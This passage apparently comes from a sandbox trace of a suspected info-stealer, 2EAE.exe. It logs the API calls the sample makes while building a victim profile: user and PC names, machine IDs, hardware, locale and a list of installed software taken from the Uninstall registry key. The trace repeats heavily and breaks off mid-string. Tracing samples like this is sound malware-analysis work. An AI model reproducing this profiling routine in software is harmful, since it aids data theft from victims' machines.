C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016" [0175.939] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.939] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 " [0175.940] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001" [0175.940] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\n" [0175.940] RegCloseKey (hKey=0x354) returned 0x0 [0175.940] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x2f, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-00E1-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.940] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-00E1-0409-0000-0000000FF1CE}") returned 90 [0175.940] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-00E1-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.940] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Office OSM MUI (English) 2016", lpcbData=0x197fd4*=0x28) returned 0x0 [0175.940] lstrlenA (lpString="Microsoft Office OSM MUI (English) 2016") returned 39 [0175.940] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Office OSM MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 